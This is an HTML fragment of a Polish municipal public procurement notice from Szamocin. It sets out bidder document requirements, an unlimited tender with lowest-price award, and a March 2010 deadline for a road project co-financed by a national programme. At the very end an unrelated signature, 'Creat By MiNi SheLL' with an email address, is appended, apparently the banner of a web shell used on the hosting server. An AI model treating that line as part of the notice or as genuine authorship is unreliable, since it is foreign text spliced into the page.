<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szamocin.umig.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta i Gminy  Szamocin 
Plac  Wolności 19 
64-820  Szamocin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.03.2010 godzina 09:30, miejsce: Urząd  Miasta  i  Gminy   Szamocin 
Plac  Wolności 19  
64-820  Szamocin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie    z dofinansowaniem   z  Narodowego  Programu Przebudowy   Dróg  Lokalnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com